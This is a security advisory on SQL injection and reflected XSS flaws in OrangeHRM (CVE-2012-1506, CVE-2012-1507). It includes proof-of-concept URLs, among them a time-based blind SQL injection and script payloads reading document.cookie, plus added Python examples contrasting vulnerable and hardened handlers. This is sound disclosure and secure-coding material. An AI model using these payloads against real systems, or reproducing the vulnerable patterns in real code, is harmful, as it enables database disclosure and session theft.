CVSS2: 6.5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
EPSS: 0.007 Low (percentile 77.1%)
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in OrangeHRM, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
SQL Injection in OrangeHRM: CVE-2012-1506
1.1 Input passed via the “hspSummaryId” GET parameter to /plugins/ajaxCalls/haltResumeHsp.php is not properly sanitised before being used in an SQL “UPDATE” query. This vulnerability can be exploited by time-based blind SQL injection techniques to reveal sensitive information from the database.
The following PoC (Proof of Concept) delays script execution if the MySQL server version is 5.*:
http://[host]/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus=1&empId=2&hspSummaryId=%27%20OR%20%28select%20IF%28%28select%20mid%28version%28%29,1,1%29%29=5,%28select%20BENCHMARK%281000000,ENCODE%28%22hello%22,%22goodbye%22%29%29%29,%272%27%29%29%20--%202
Successful exploitation of this vulnerability requires the attacker to be registered and logged in.
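The defect in 1.1 is a request value spliced into the text of an UPDATE statement. The following added example (not code from the advisory or from OrangeHRM, written in Python rather than the application's PHP) shows that pattern next to the hardened form: the parameter is validated as an integer and bound with a placeholder, so the database never parses it as SQL. The table and column names are assumptions chosen for the demo.

```python
import sqlite3


def make_db():
    # Constructed in-memory table standing in for the HSP summary records that
    # haltResumeHsp.php updates; the table and column names are assumptions.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE hsp_summary (summary_id INTEGER PRIMARY KEY, emp_id INTEGER, status INTEGER)"
    )
    conn.executemany(
        "INSERT INTO hsp_summary VALUES (?, ?, ?)", [(1, 1, 0), (2, 2, 0), (3, 3, 0)]
    )
    conn.commit()
    return conn


def halt_resume_vulnerable(conn, hsp_summary_id, new_status):
    # The defect the advisory describes: request parameters are spliced straight
    # into the UPDATE text, so the WHERE clause is under the caller's control.
    sql = (f"UPDATE hsp_summary SET status = {new_status} "
           f"WHERE summary_id = {hsp_summary_id}")
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount  # rows actually changed


def halt_resume_hardened(conn, hsp_summary_id, new_status):
    # 1. Validate: both values are integers in the data model, so anything else is rejected.
    try:
        summary_id = int(hsp_summary_id)
        status = int(new_status)
    except (TypeError, ValueError):
        raise ValueError("hspSummaryId and newHspStatus must be integers")
    if status not in (0, 1):
        raise ValueError("newHspStatus must be 0 (halt) or 1 (resume)")
    # 2. Bind with placeholders; the driver passes the values separately from the SQL text.
    cur = conn.execute(
        "UPDATE hsp_summary SET status = ? WHERE summary_id = ?", (status, summary_id)
    )
    conn.commit()
    return cur.rowcount


def handle_request(conn, params, hardened=True):
    # Request-level wrapper mimicking the script's entry point: returns ("ok", rows)
    # or ("rejected", reason) so a rejection can be logged rather than silently dropped.
    handler = halt_resume_hardened if hardened else halt_resume_vulnerable
    try:
        return ("ok", handler(conn, params.get("hspSummaryId"), params.get("newHspStatus")))
    except ValueError as err:
        return ("rejected", str(err))


if __name__ == "__main__":
    legit = {"hspSummaryId": "2", "newHspStatus": "1", "empId": "2"}
    tampered = {"hspSummaryId": "2 OR 1=1", "newHspStatus": "1", "empId": "2"}
    print(handle_request(make_db(), legit, hardened=False))     # ('ok', 1)
    print(handle_request(make_db(), tampered, hardened=False))  # ('ok', 3): every row changed
    print(handle_request(make_db(), tampered, hardened=True))   # ('rejected', ...)
```

The contrast worth noting is the row count: with the vulnerable handler a tampered id changes every row, while the hardened handler refuses the request before any SQL runs. Validation and parameter binding are both kept because they address different failures: the integer check catches malformed input early and gives a loggable reason, and the placeholder guarantees correctness even if a later change loosens the validation.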
Multiple Cross-Site Scripting (XSS) in OrangeHRM: CVE-2012-1507
2.1 Input passed via the “newHspStatus” GET parameter to /plugins/ajaxCalls/haltResumeHsp.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user’s browser session in the context of the affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/plugins/ajaxCalls/haltResumeHsp.php?hspSummaryId=1&newHspStatus=1%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&empId=1
2.2 Input passed via the “sortOrder” GET parameter to /templates/hrfunct/emppop.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user’s browser session in the context of the affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/templates/hrfunct/emppop.php?reqcode=1&sortOrder1=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
2.3 Input passed via the “uri” GET parameter to /index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in an administrator’s browser session in the context of the affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/index.php?uri=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
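All three XSS findings (2.1 to 2.3) share one root cause: a GET parameter is written back into the response without output encoding, and in 2.2 and 2.3 the PoC value starts with "> to close the attribute it lands in. The following added example (not code from the advisory or from OrangeHRM, written in Python rather than PHP) decodes the query strings quoted on this page, reflects each value through a vulnerable and a hardened renderer, and checks whether a script tag survives. The HTML templates are assumptions standing in for the real reflection points, which the page does not show.

```python
from html import escape
from urllib.parse import unquote


def parse_query(query_string):
    # Minimal decoder for the query strings quoted in the advisory; splits on '&'
    # only, so the ';' inside the PoC values is kept as part of the value.
    params = {}
    for pair in query_string.split("&"):
        name, _, value = pair.partition("=")
        params[unquote(name)] = unquote(value)
    return params


# Constructed templates standing in for the three reflection points the advisory
# lists; the real OrangeHRM markup is not on the page, so these are assumptions.
TEMPLATES = {
    "newHspStatus": "<span>Status: {value}</span>",                     # text node (2.1)
    "sortOrder1": '<a href="emppop.php?sortOrder1={value}">Sort</a>',   # attribute value (2.2)
    "uri": '<iframe src="{value}"></iframe>',                           # attribute value (2.3)
}


def reflect_vulnerable(template, value):
    # The defect the advisory describes: the raw request value is written into the page.
    return template.replace("{value}", value)


def reflect_hardened(template, value):
    # html.escape() encodes & < > " and ', so the value can neither close the
    # surrounding attribute (the "> prefix in PoCs 2.2 and 2.3) nor open a tag.
    return template.replace("{value}", escape(value, quote=True))


def render_page(query_string, hardened=True):
    params = parse_query(query_string)
    reflect = reflect_hardened if hardened else reflect_vulnerable
    return "\n".join(reflect(tpl, params.get(name, "")) for name, tpl in TEMPLATES.items())


def has_injected_script(markup):
    # Detection used below: a literal <script tag present in the rendered output.
    return "<script" in markup.lower()


if __name__ == "__main__":
    # Query string taken from PoC 2.3 on this page.
    poc = "uri=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E"
    print(render_page(poc, hardened=False))
    print(render_page(poc, hardened=True))
```

Escaping with quote=True is what stops the attribute breakout shown in 2.2 and 2.3; escaping without quotes would leave the " intact and the hardened renderer would be no better than the vulnerable one for those two cases. Values that end up in src or href attributes, as the uri parameter does here, additionally need their URL scheme restricted, which this example does not cover.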